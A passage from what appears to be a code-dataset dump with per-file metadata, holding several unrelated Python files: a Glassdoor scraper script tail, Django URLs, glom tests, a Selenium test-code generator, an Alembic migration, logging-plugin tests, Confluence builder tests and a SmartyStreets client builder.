Please, provide either path to the fiel with credentials or email/password directly to cmd.')
## file path to the txt file with companies
if args.companies:
try:
with open(args.companies, 'r') as f:
companies = [line.strip() for line in f]
print(f"{len(companies)} companies are to be scraped.")
except FileNotFoundError:
raise Exception('The filepath given does noe exist or the format of the file is not appropriate')
else:
raise Exception('Filepath to the text file containing companies must be provided.')
## if url provided, the length of the url file and companies file must be the same
if args.url:
if args.url:
try:
with open(args.url, 'r') as f:
urls = [line.strip() for line in f]
except FileNotFoundError:
raise Exception('The filepath given does noe exist or the format of the file is not appropriate')
else:
urls = [None for company in companies]
raise Exception('Both parameters companies and url must be given.')
## min_date | max_reivew_age
if (args.min_date!=None) & (args.max_review_age!=None):
raise Exception('Only one parameter out of min_date and max_review_age can be specified!')
## file path to the output files
if args.output_path:
file_type = args.output_path.split('.')[-1]
if file_type not in ['csv', 'xlsx', 'xls']:
raise Exception('Invalid file path format.')
if args.limit:
try:
args.limit = int(args.limit)
except Exception:
raise TypeError('Limit must be a type of an integer!.')
else:
args.limit = float(np.inf)
#######################
##### APPLICATION #####
#######################
def main():
if args.mysite_path :
# import Company - django.db.models.Model
set_django_db(mysite_path=args.mysite_path)
from tables_daniel.models import Review, Company
else:
Review = None
scraper = GlassdoorScraper(
chrome_driver_path=args.chrome_driver_path,
email=args.email,
password=args.password,
headless_browsing=args.headless,
review_writer=Review,
company_reader=Company,
max_review_age=args.max_review_age,
min_date=args.min_date
)
for company_name, url in zip(companies, urls):
scraper.getOnReviewsPage(
company_name=company_name,
location=args.location,
url=url
)
scraper.acceptCookies()
scraper.scrape(
company_name=company_name,
location=args.location,
limit=args.limit
)
if __name__=='__main__':
main() | 30.469697 | 132 | 0.671805 | 815 | 6,033 | 4.878528 | 0.258896 | 0.029427 | 0.055584 | 0.022636 | 0.238682 | 0.228119 | 0.191901 | 0.170775 | 0.115694 | 0.115694 | 0 | 0.000215 | 0.227747 | 6,033 | 198 | 133 | 30.469697 | 0.853187 | 0.064479 | 0 | 0.2125 | 0 | 0 | 0.199533 | 0.008613 | 0 | 0 | 0 | 0 | 0 | 1 | 0.00625 | false | 0.075 | 0.10625 | 0 | 0.1125 | 0.00625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
df599e9d10321b7bdbba2162c39d2da1b3bddbed | 468 | py | Python | week12/api/urls.py | yestemir/web | 5bdead66c26a3c466701e25ecae9720f04ad4118 | [
"Unlicense"
] | null | null | null | week12/api/urls.py | yestemir/web | 5bdead66c26a3c466701e25ecae9720f04ad4118 | [
"Unlicense"
] | 13 | 2021-03-10T08:46:52.000Z | 2022-03-02T08:13:58.000Z | week12/api/urls.py | yestemir/web | 5bdead66c26a3c466701e25ecae9720f04ad4118 | [
"Unlicense"
] | null | null | null | from django.urls import path
#from api.views import company_list, company_details, company_vacancies, vacancies_list, vacancy_detail
from api.views import company_list, company_details
urlpatterns = [
path('companies/', company_list),
path('companies/<int:company_id>/', company_details),
#path('companies/<int:company_id>/vacancies/', company_vacancies),
#path('vacancies/', vacancies_list),
#path('vacancies/<int:vacancy_id>', vacancy_detail)
]
| 39 | 103 | 0.758547 | 58 | 468 | 5.862069 | 0.293103 | 0.097059 | 0.070588 | 0.105882 | 0.4 | 0.252941 | 0.252941 | 0.252941 | 0 | 0 | 0 | 0 | 0.111111 | 468 | 11 | 104 | 42.545455 | 0.817308 | 0.538462 | 0 | 0 | 0 | 0 | 0.174528 | 0.127358 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
df5bcf4144a389293dde7bcc338b8d079f6fde6d | 6,587 | py | Python | glom/test/test_path_and_t.py | justinvanwinkle/glom | 6451e9800b50078b60ebb480be83385cc70b1b3a | [
"BSD-3-Clause"
] | null | null | null | glom/test/test_path_and_t.py | justinvanwinkle/glom | 6451e9800b50078b60ebb480be83385cc70b1b3a | [
"BSD-3-Clause"
] | null | null | null | glom/test/test_path_and_t.py | justinvanwinkle/glom | 6451e9800b50078b60ebb480be83385cc70b1b3a | [
"BSD-3-Clause"
] | null | null | null |
from pytest import raises
from glom import glom, Path, S, T, A, PathAccessError, GlomError, BadSpec
def test_list_path_access():
assert glom(list(range(10)), Path(1)) == 1
def test_path():
_obj = object()
target = {'a': {'b.b': [None, {_obj: [None, None, 'd']}]}}
assert glom(target, Path('a', 'b.b', 1, _obj, -1)) == 'd'
def test_empty_path_access():
target = {}
assert glom(target, Path()) is target
assert glom(target, (Path(), Path(), Path())) is target
dup_dict = glom(target, {'target': Path(),
'target2': Path()})
dup_dict['target'] is target
dup_dict['target2'] is target
def test_path_t_roundtrip():
# check that T repr roundrips
assert repr(T['a'].b.c()) == "T['a'].b.c()"
assert repr(T[1:]) == "T[1:]"
assert repr(T[::3, 1:, 1:2, :2:3]) == "T[::3, 1:, 1:2, :2:3]"
# check that Path repr roundtrips
assert repr(Path('a', 1, 'b.b', -1.0)) == "Path('a', 1, 'b.b', -1.0)"
# check that Path repr roundtrips when it contains Ts
assert repr(Path(T['a'].b, 'c', T['d'].e)) == "Path(T['a'].b, 'c', T['d'].e)"
# check that T instances containing Path access revert to repring with Path
assert repr(Path(T['a'].b, 'c', T['d'].e).path_t) == "Path(T['a'].b, 'c', T['d'].e)"
# check that Paths containing only T objects reduce to a T (joining the T objects)
assert repr(Path(T['a'].b, T.c())) == "T['a'].b.c()"
# check that multiple nested paths reduce
assert repr(Path(Path(Path('a')))) == "Path('a')"
# check builtin repr
assert repr(T[len]) == 'T[len]'
assert repr(T.func(len, sum)) == 'T.func(len, sum)'
def test_path_access_error_message():
# test fuzzy access
with raises(GlomError) as exc_info:
glom({}, 'a.b')
assert ("PathAccessError: could not access 'a', part 0 of Path('a', 'b'), got error: KeyError"
in exc_info.exconly())
ke = repr(KeyError('a')) # py3.7+ changed the keyerror repr
assert repr(exc_info.value) == "PathAccessError(" + ke + ", Path('a', 'b'), 0)"
# test multi-part Path with T, catchable as a KeyError
with raises(KeyError) as exc_info:
# don't actually use glom to copy your data structures please
glom({'a': {'b': 'c'}}, Path('a', T.copy(), 'd'))
assert ("PathAccessError: could not access 'd', part 3 of Path('a', T.copy(), 'd'), got error: KeyError"
in exc_info.exconly())
ke = repr(KeyError('d')) # py3.7+ changed the keyerror repr
assert repr(exc_info.value) == "PathAccessError(" + ke + ", Path('a', T.copy(), 'd'), 3)"
# test AttributeError
with raises(GlomError) as exc_info:
glom({'a': {'b': 'c'}}, Path('a', T.b))
assert ("PathAccessError: could not access 'b', part 1 of Path('a', T.b), got error: AttributeError"
in exc_info.exconly())
ae = repr(AttributeError("'dict' object has no attribute 'b'"))
assert repr(exc_info.value) == "PathAccessError(" + ae + ", Path(\'a\', T.b), 1)"
def test_t_picklability():
import pickle
class TargetType(object):
def __init__(self):
self.attribute = lambda: None
self.attribute.method = lambda: {'key': lambda x: x * 2}
spec = T.attribute.method()['key'](x=5)
rt_spec = pickle.loads(pickle.dumps(spec))
assert repr(spec) == repr(rt_spec)
assert glom(TargetType(), spec) == 10
s_spec = S.attribute
assert repr(s_spec) == repr(pickle.loads(pickle.dumps(s_spec)))
def test_a_forbidden():
with raises(BadSpec):
A() # cannot assign to function call
with raises(BadSpec):
glom(1, A) # cannot assign without destination
def test_s_magic():
assert glom(None, S.test, scope={'test': 'value'}) == 'value'
with raises(PathAccessError):
glom(1, S.a) # ref to 'a' which doesn't exist in scope
with raises(PathAccessError):
glom(1, A.b.c)
return
def test_path_len():
assert len(Path()) == 0
assert len(Path('a', 'b', 'c')) == 3
assert len(Path.from_text('1.2.3.4')) == 4
assert len(Path(T)) == 0
assert len(Path(T.a.b.c)) == 3
assert len(Path(T.a()['b'].c.d)) == 5
def test_path_getitem():
path = Path(T.a.b.c)
assert path[0] == Path(T.a)
assert path[1] == Path(T.b)
assert path[2] == Path(T.c)
assert path[-1] == Path(T.c)
assert path[-2] == Path(T.b)
with raises(IndexError, match='Path index out of range'):
path[4]
with raises(IndexError, match='Path index out of range'):
path[-14]
return
def test_path_slices():
path = Path(T.a.b, 1, 2, T(test='yes'))
assert path[::] == path
# positive indices
assert path[3:] == Path(2, T(test='yes'))
assert path[1:3] == Path(T.b, 1)
assert path[:3] == Path(T.a.b, 1)
# positive indices backwards
assert path[2:1] == Path()
# negative indices forward
assert path[-1:] == Path(T(test='yes'))
assert path[:-2] == Path(T.a.b, 1)
assert path[-3:-1] == Path(1, 2)
# negative indices backwards
assert path[-1:-3] == Path()
# slicing and stepping
assert path[1::2] == Path(T.b, 2)
def test_path_values():
path = Path(T.a.b, 1, 2, T(test='yes'))
assert path.values() == ('a', 'b', 1, 2, ((), {'test': 'yes'}))
assert Path().values() == ()
def test_path_items():
path = Path(T.a, 1, 2, T(test='yes'))
assert path.items() == (('.', 'a'),
('P', 1), ('P', 2),
('(', ((), {'test': 'yes'})))
assert Path().items() == ()
def test_path_eq():
assert Path('a', 'b') == Path('a', 'b')
assert Path('a') != Path('b')
assert Path() != object()
def test_path_eq_t():
assert Path(T.a.b) == T.a.b
assert Path(T.a.b.c) != T.a.b
def test_startswith():
ref = T.a.b[1]
assert Path(ref).startswith(T)
assert Path(ref).startswith(T.a.b)
assert Path(ref).startswith(ref)
assert Path(ref).startswith(ref.c) is False
assert Path('a.b.c').startswith(Path())
assert Path('a.b.c').startswith('a.b.c')
with raises(TypeError):
assert Path('a.b.c').startswith(None)
return
def test_from_t_identity():
ref = Path(T.a.b)
assert ref.from_t() == ref
assert ref.from_t() is ref
def test_t_dict_key():
target = {'a': 'A'}
assert glom(target, {T['a']: 'a'}) == {'A': 'A'}
def test_t_dunders():
with raises(AttributeError) as exc_info:
T.__name__
assert 'use T.__("name__")' in str(exc_info.value)
assert glom(1, T.__('class__')) is int
| 27.560669 | 108 | 0.570366 | 1,017 | 6,587 | 3.609636 | 0.154376 | 0.020703 | 0.017979 | 0.028603 | 0.409698 | 0.253337 | 0.186598 | 0.148461 | 0.148461 | 0.129937 | 0 | 0.018999 | 0.232883 | 6,587 | 238 | 109 | 27.676471 | 0.7075 | 0.115986 | 0 | 0.113475 | 0 | 0.021277 | 0.141207 | 0 | 0 | 0 | 0 | 0 | 0.468085 | 1 | 0.141844 | false | 0 | 0.021277 | 0 | 0.191489 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df61b88c89a2f284a18232a1fc105ff2477b2b45 | 4,665 | py | Python | FHIR_Tester_backend/services/monkey/MonkeyInterpreter.py | ideaworld/FHIR_Tester | 62844af2de510b65535df5ae60da03a082097df0 | [
"MIT"
] | null | null | null | FHIR_Tester_backend/services/monkey/MonkeyInterpreter.py | ideaworld/FHIR_Tester | 62844af2de510b65535df5ae60da03a082097df0 | [
"MIT"
] | 4 | 2020-06-05T17:40:18.000Z | 2022-02-11T03:38:16.000Z | FHIR_Tester_backend/services/monkey/MonkeyInterpreter.py | bowen1993/FHIR_Tester | 62844af2de510b65535df5ae60da03a082097df0 | [
"MIT"
] | 1 | 2016-11-22T01:04:16.000Z | 2016-11-22T01:04:16.000Z | from CodeGenerator import *
class MonkeyInterpreter:
def __init__(self, prog, filename="", identify="", base_path=""):
self.prog = prog
self.func_table = {}
self.code_str = ''
self.filename = filename
self.url = ''
self.driver = ''
self.indent = 0
self._code_init()
self.base_path = base_path
self.id = identify
self.image_index = 0
def _code_init(self):
self.code_str = """from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
import time
user_agent = (
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50'"
)
steps = []
dcap = dict(DesiredCapabilities.PHANTOMJS)
dcap["phantomjs.page.settings.userAgent"] = user_agent
"""
def save(self):
if len(self.filename) > 0:
code_file = open(self.filename, 'w')
code_file.write(self.code_str)
code_file.close()
return (True, 'Success')
else:
return (False, 'No filename or empty filename')
def curr_indent(self):
return ' '*self.indent
def add_screenshot(self, filename, hint):
step_info_dict = {
'basepath': self.base_path,
'filename':filename,
'id':self.id,
'hint':hint
}
self.code_str += "driver.get_screenshot_as_file('%(basepath)s/%(id)s_%(filename)s')\nsteps.append(('%(hint)s','%(basepath)s/%(id)s_%(filename)s'))\n" % step_info_dict
def get_screenshot_code(self, filename, hint):
step_info_dict = {
'basepath': self.base_path,
'filename':filename,
'id':self.id,
'hint':hint
}
return "driver.get_screenshot_as_file('%(basepath)s/%(id)s_%(filename)s')\nsteps.append(('%(hint)s','%(basepath)s/%(id)s_%(filename)s'))\n" % step_info_dict
def translate(self):
for index, action in enumerate(self.prog):
print action
if action['type'] == 'auth':
self.code_str += self.transAuth(action)
elif 'single' in action['type']:
self.code_str += self.transSingleAction(action)
elif 'target' in action['type']:
self.code_str += self.transTargetAction(action)
elif 'command' in action['type']:
self.code_str += self.transCommandAction(action)
elif 'judge' in action['type']:
self.code_str += self.transJudgeAction(action)
elif 'repeat' in action['type']:
self.code_str += self.transRepeat(action)
elif 'task' in action['type']:
self.code_str += self.transTask(action)
if "driver.get(" in self.code_str:
self.add_screenshot("%d.png"%self.image_index, action['move'])
self.image_index += 1
self.code_str += "driver.close()"
def transAuth(self, action):
username = action['username']
password = action['password']
return "driver.switch_to.alert.authenticate('%s','%s')" % (username, password)
def transSingleAction(self, action):
move = action['move']
if move == 'DoGenomicAuth':
is_success, increase,stmt_str = globals()[move](self.get_screenshot_code, self.image_index)
self.image_index += increase
else:
is_success, stmt_str = globals()[move]()
if is_success:
return stmt_str
def transTargetAction(self, action):
move = action['move']
args = {
'target':action['target']
}
if 'value' in action:
args['value'] = action['value']
is_success, stmt_str = globals()[move](**args)
if is_success:
return stmt_str
def transCommandAction(self, action):
move = action['move']
args = {
'value':action['value']
}
is_success, stmt_str = globals()[move](**args)
if is_success:
return stmt_str
def transJudgeAction(self, action):
args = {
'target':action['target'],
'value':action['expect'],
'is_equal' : action['is_equal']
}
is_success, stmt_str = Judge(**args)
if is_success:
return stmt_str
def transRepeat(self, action):
return ""
def transTask(self, action):
return ""
def get_code_content(self):
return self.code_str | 35.075188 | 174 | 0.569132 | 527 | 4,665 | 4.870968 | 0.244782 | 0.046747 | 0.059992 | 0.052591 | 0.326841 | 0.317491 | 0.286716 | 0.213089 | 0.201013 | 0.201013 | 0 | 0.007657 | 0.300107 | 4,665 | 133 | 175 | 35.075188 | 0.77856 | 0 | 0 | 0.252101 | 0 | 0.02521 | 0.220103 | 0.098157 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.016807 | 0.042017 | null | null | 0.008403 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df622c6b331e5a543976b1e74365b5b1c5deac19 | 1,027 | py | Python | migrations/versions/1a869ac514c_.py | isabella232/comport | 117123862415261095a917ed7f2037c1f986b474 | [
"BSD-3-Clause"
] | 35 | 2015-11-14T18:32:45.000Z | 2022-01-23T15:15:05.000Z | migrations/versions/1a869ac514c_.py | codeforamerica/comport | 117123862415261095a917ed7f2037c1f986b474 | [
"BSD-3-Clause"
] | 119 | 2015-11-20T22:45:34.000Z | 2022-02-10T23:02:36.000Z | migrations/versions/1a869ac514c_.py | isabella232/comport | 117123862415261095a917ed7f2037c1f986b474 | [
"BSD-3-Clause"
] | 19 | 2015-11-20T20:41:52.000Z | 2022-01-26T04:12:34.000Z | """empty message
Revision ID: 1a869ac514c
Revises: 52887f8e06b
Create Date: 2015-09-29 11:06:57.293537
"""
# revision identifiers, used by Alembic.
revision = '1a869ac514c'
down_revision = '52887f8e06b'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('interesteds',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=255), nullable=False),
sa.Column('agency', sa.String(length=255), nullable=False),
sa.Column('location', sa.String(length=255), nullable=False),
sa.Column('phone', sa.String(length=255), nullable=False),
sa.Column('email', sa.String(length=255), nullable=False),
sa.Column('comments', sa.String(length=255), nullable=False),
sa.PrimaryKeyConstraint('id')
)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_table('interesteds')
### end Alembic commands ###
| 28.527778 | 65 | 0.686465 | 130 | 1,027 | 5.4 | 0.407692 | 0.079772 | 0.149573 | 0.179487 | 0.441595 | 0.441595 | 0.441595 | 0.396011 | 0 | 0 | 0 | 0.078341 | 0.15482 | 1,027 | 35 | 66 | 29.342857 | 0.730415 | 0.281402 | 0 | 0 | 0 | 0 | 0.119149 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0 | 0.117647 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df6c0d5895a889ba43d3854f304957c6a4db6d15 | 2,310 | py | Python | tests/test_compat.py | eisensheng/pytest-catchlog | f6b05b0afb8f8934b33e0c78a495ebfd8b3599d6 | [
"MIT"
] | 85 | 2015-02-24T20:14:30.000Z | 2021-04-29T09:07:59.000Z | tests/test_compat.py | eisensheng/pytest-catchlog | f6b05b0afb8f8934b33e0c78a495ebfd8b3599d6 | [
"MIT"
] | 67 | 2015-04-22T16:07:47.000Z | 2020-03-19T14:14:19.000Z | tests/test_compat.py | eisensheng/pytest-catchlog | f6b05b0afb8f8934b33e0c78a495ebfd8b3599d6 | [
"MIT"
] | 25 | 2015-05-17T15:22:55.000Z | 2019-01-07T09:21:24.000Z | # -*- coding: utf-8 -*-
import pytest
def test_camel_case_aliases(testdir):
testdir.makepyfile('''
import logging
logger = logging.getLogger(__name__)
def test_foo(caplog):
caplog.setLevel(logging.INFO)
logger.debug('boo!')
with caplog.atLevel(logging.WARNING):
logger.info('catch me if you can')
''')
result = testdir.runpytest()
assert result.ret == 0
with pytest.raises(pytest.fail.Exception):
result.stdout.fnmatch_lines(['*- Captured *log call -*'])
result = testdir.runpytest('-rw')
assert result.ret == 0
result.stdout.fnmatch_lines('''
=*warning summary*=
*WL1*test_camel_case_aliases*caplog.setLevel()*deprecated*
*WL1*test_camel_case_aliases*caplog.atLevel()*deprecated*
''')
def test_property_call(testdir):
testdir.makepyfile('''
import logging
logger = logging.getLogger(__name__)
def test_foo(caplog):
logger.info('boo %s', 'arg')
assert caplog.text == caplog.text() == str(caplog.text)
assert caplog.records == caplog.records() == list(caplog.records)
assert (caplog.record_tuples ==
caplog.record_tuples() == list(caplog.record_tuples))
''')
result = testdir.runpytest()
assert result.ret == 0
result = testdir.runpytest('-rw')
assert result.ret == 0
result.stdout.fnmatch_lines('''
=*warning summary*=
*WL1*test_property_call*caplog.text()*deprecated*
*WL1*test_property_call*caplog.records()*deprecated*
*WL1*test_property_call*caplog.record_tuples()*deprecated*
''')
def test_records_modification(testdir):
testdir.makepyfile('''
import logging
logger = logging.getLogger(__name__)
def test_foo(caplog):
logger.info('boo %s', 'arg')
assert caplog.records
assert caplog.records()
del caplog.records()[:] # legacy syntax
assert not caplog.records
assert not caplog.records()
logger.info('foo %s', 'arg')
assert caplog.records
assert caplog.records()
''')
result = testdir.runpytest()
assert result.ret == 0
| 28.518519 | 77 | 0.59697 | 243 | 2,310 | 5.506173 | 0.255144 | 0.106876 | 0.082212 | 0.059791 | 0.587444 | 0.573991 | 0.483558 | 0.398356 | 0.347534 | 0.347534 | 0 | 0.006571 | 0.275325 | 2,310 | 80 | 78 | 28.875 | 0.792712 | 0.009091 | 0 | 0.616667 | 0 | 0 | 0.693485 | 0.212505 | 0 | 0 | 0 | 0 | 0.233333 | 1 | 0.05 | false | 0 | 0.066667 | 0 | 0.116667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df709514b8d346cc0a38a3bd3f1378bb77a71fa2 | 4,561 | py | Python | tests/unit-tests/test_rst_lists.py | hazemelraffiee/confluencebuilder | c283e7fb513c156b9b6e0ba3694fc3e0468a74c9 | [
"BSD-2-Clause"
] | 90 | 2016-07-21T00:39:19.000Z | 2019-03-08T08:27:17.000Z | tests/unit-tests/test_rst_lists.py | hazemelraffiee/confluencebuilder | c283e7fb513c156b9b6e0ba3694fc3e0468a74c9 | [
"BSD-2-Clause"
] | 124 | 2016-10-18T20:06:48.000Z | 2019-03-08T04:41:53.000Z | tests/unit-tests/test_rst_lists.py | hazemelraffiee/confluencebuilder | c283e7fb513c156b9b6e0ba3694fc3e0468a74c9 | [
"BSD-2-Clause"
] | 39 | 2016-07-21T00:39:52.000Z | 2019-03-06T14:33:31.000Z | # -*- coding: utf-8 -*-
"""
:copyright: Copyright 2020-2022 Sphinx Confluence Builder Contributors (AUTHORS)
:license: BSD-2-Clause (LICENSE)
"""
from tests.lib.testcase import ConfluenceTestCase
from tests.lib.testcase import setup_builder
from tests.lib import parse
import os
class TestConfluenceRstLists(ConfluenceTestCase):
@classmethod
def setUpClass(cls):
super(TestConfluenceRstLists, cls).setUpClass()
cls.dataset = os.path.join(cls.datasets, 'common')
cls.filenames = [
'lists',
]
@setup_builder('confluence')
def test_storage_rst_lists(self):
out_dir = self.build(self.dataset, filenames=self.filenames)
with parse('lists', out_dir) as data:
root_tags = data.find_all(recursive=False)
self.assertEqual(len(root_tags), 3)
# ##########################################################
# bullet list
# ##########################################################
bullet_list = root_tags.pop(0)
self.assertEqual(bullet_list.name, 'ul')
items = bullet_list.find_all('li', recursive=False)
self.assertEqual(len(items), 4)
self.assertEqual(items[0].text.strip(), 'first bullet')
self.assertEqual(items[2].text.strip(), 'third item')
self.assertEqual(items[3].text.strip(), 'forth item')
complex_list = items[1]
complex_tags = complex_list.find_all(recursive=False)
self.assertEqual(complex_tags[0].name, 'p')
self.assertEqual(complex_tags[0].text.strip(), 'second item')
self.assertEqual(complex_tags[1].name, 'p')
self.assertEqual(complex_tags[1].text.strip(),
'second paragraph in the second item')
self.assertEqual(complex_tags[2].name, 'p')
self.assertEqual(complex_tags[2].text.strip(),
'third paragraph in the second item')
self.assertEqual(complex_tags[3].name, 'ul')
sublist = complex_tags[3].find_all('li', recursive=False)
self.assertEqual(len(sublist), 3)
# ##########################################################
# enumerated list
# ##########################################################
enumerated_list = root_tags.pop(0)
self.assertEqual(enumerated_list.name, 'ol')
css_style = 'list-style-type: decimal'
self.assertTrue(enumerated_list.has_attr('style'))
self.assertTrue(css_style in enumerated_list['style'])
items = enumerated_list.find_all('li', recursive=False)
self.assertEqual(len(items), 2)
self.assertEqual(items[0].text.strip(), 'enumerated a1')
self.assertEqual(items[1].text.strip(), 'enumerated a2')
# ##########################################################
# enumerated list (styled)
# ##########################################################
enumerated_list = root_tags.pop(0)
self.assertEqual(enumerated_list.name, 'ol')
css_style = 'list-style-type: decimal'
self.assertTrue(enumerated_list.has_attr('style'))
self.assertTrue(css_style in enumerated_list['style'])
items = enumerated_list.find_all('li', recursive=False)
self.assertEqual(len(items), 4)
css_style = 'list-style-type: lower-alpha'
sublist1 = items[0].find('ol', recursive=False)
self.assertIsNotNone(sublist1)
self.assertTrue(sublist1.has_attr('style'))
self.assertTrue(css_style in sublist1['style'])
css_style = 'list-style-type: upper-alpha'
sublist2 = items[1].find('ol', recursive=False)
self.assertIsNotNone(sublist2)
self.assertTrue(sublist2.has_attr('style'))
self.assertTrue(css_style in sublist2['style'])
css_style = 'list-style-type: decimal'
sublist3 = items[2].find('ol', recursive=False)
self.assertIsNotNone(sublist3)
self.assertTrue(sublist3.has_attr('style'))
self.assertTrue(css_style in sublist3['style'])
css_style = 'list-style-type: lower-roman'
sublist4 = items[3].find('ol', recursive=False)
self.assertIsNotNone(sublist4)
self.assertTrue(sublist4.has_attr('style'))
self.assertTrue(css_style in sublist4['style'])
| 40.362832 | 80 | 0.557772 | 469 | 4,561 | 5.296375 | 0.215352 | 0.120773 | 0.072464 | 0.073269 | 0.582528 | 0.553543 | 0.338969 | 0.32649 | 0.252013 | 0.211755 | 0 | 0.01584 | 0.252576 | 4,561 | 112 | 81 | 40.723214 | 0.712819 | 0.042535 | 0 | 0.202703 | 0 | 0 | 0.101725 | 0 | 0 | 0 | 0 | 0 | 0.486486 | 1 | 0.027027 | false | 0 | 0.054054 | 0 | 0.094595 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df772962564e76e30a2b4e2a05a98491303c2ed2 | 5,776 | py | Python | smartystreets_python_sdk/client_builder.py | jasonrfarkas/smartystreets-python-sdk | bcb94efc09c795222eb1bd85544073a6cc063a46 | [
"Apache-2.0"
] | null | null | null | smartystreets_python_sdk/client_builder.py | jasonrfarkas/smartystreets-python-sdk | bcb94efc09c795222eb1bd85544073a6cc063a46 | [
"Apache-2.0"
] | null | null | null | smartystreets_python_sdk/client_builder.py | jasonrfarkas/smartystreets-python-sdk | bcb94efc09c795222eb1bd85544073a6cc063a46 | [
"Apache-2.0"
] | null | null | null | import smartystreets_python_sdk as smarty
from smartystreets_python_sdk.us_street import Client as USStreetClient
from smartystreets_python_sdk.us_zipcode import Client as USZIPClient
from smartystreets_python_sdk.us_extract import Client as USExtractClient
from smartystreets_python_sdk.us_autocomplete import Client as USAutocompleteClient
from smartystreets_python_sdk.international_street import Client as InternationalStreetClient
class ClientBuilder:
def __init__(self, signer):
"""
The ClientBuilder class helps you build a client object for one of the supported SmartyStreets APIs.
You can use ClientBuilder's methods to customize settings like maximum retries or timeout duration.
These methods are chainable, so you can usually get set up with one line of code.
"""
self.signer = signer
self.serializer = smarty.NativeSerializer()
self.http_sender = None
self.max_retries = 5
self.max_timeout = 10000
self.url_prefix = None
self.proxy = None
self.debug = None
self.header = None
self.INTERNATIONAL_STREET_API_URL = "https://international-street.api.smartystreets.com/verify"
self.US_AUTOCOMPLETE_API_URL = "https://us-autocomplete.api.smartystreets.com/suggest"
self.US_EXTRACT_API_URL = "https://us-extract.api.smartystreets.com"
self.US_STREET_API_URL = "https://us-street.api.smartystreets.com/street-address"
self.US_ZIP_CODE_API_URL = "https://us-zipcode.api.smartystreets.com/lookup"
def retry_at_most(self, max_retries):
"""
Sets the maximum number of times to retry sending the request to the API. (Default is 5)
Returns self to accommodate method chaining.
"""
self.max_retries = max_retries
return self
def with_max_timeout(self, max_timeout):
"""
The maximum time (in milliseconds) to wait for a connection, and also to wait for
the response to be read. (Default is 10000)
Returns self to accommodate method chaining.
"""
self.max_timeout = max_timeout
return self
def with_sender(self, sender):
"""
Default is a series of nested senders. (See build_sender()
Returns self to accommodate method chaining.
"""
self.http_sender = sender
return self
def with_serializer(self, serializer):
"""
Changes the Serializer from the default.
Returns self to accommodate method chaining.
"""
self.serializer = serializer
return self
def with_base_url(self, base_url):
"""
This may be useful when using a local installation of the SmartyStreets APIs.
base_url is a string that defaults to the URL for the API corresponding to the Client object being built.
Returns self to accommodate method chaining.
"""
self.url_prefix = base_url
return self
def with_proxy(self, host, username=None, password=None):
"""
Assigns a proxy through which to send all Lookups.
:param host: The proxy host including port, but not scheme. (example: localhost:8080)
:param username: Username to authenticate with the proxy server
:param password: Password to authenticate with the proxy server
:return: Returns self to accommodate method chaining.
"""
self.proxy = smarty.Proxy(host, username, password)
return self
def with_custom_header(self, custom_header):
"""
Create custom headers when necessary.
:param custom_header: Input your custom headers
:return: Returns self to accommodate method chaining
"""
self.header = custom_header
return self
def with_debug(self):
"""
Enables debug mode, which will print information about the HTTP request and response to the console.
Returns self to accommodate method chaining.
"""
self.debug = True
return self
def build_international_street_api_client(self):
self.ensure_url_prefix_not_null(self.INTERNATIONAL_STREET_API_URL)
return InternationalStreetClient(self.build_sender(), self.serializer)
def build_us_autocomplete_api_client(self):
self.ensure_url_prefix_not_null(self.US_AUTOCOMPLETE_API_URL)
return USAutocompleteClient(self.build_sender(), self.serializer)
def build_us_extract_api_client(self):
self.ensure_url_prefix_not_null(self.US_EXTRACT_API_URL)
return USExtractClient(self.build_sender(), self.serializer)
def build_us_street_api_client(self):
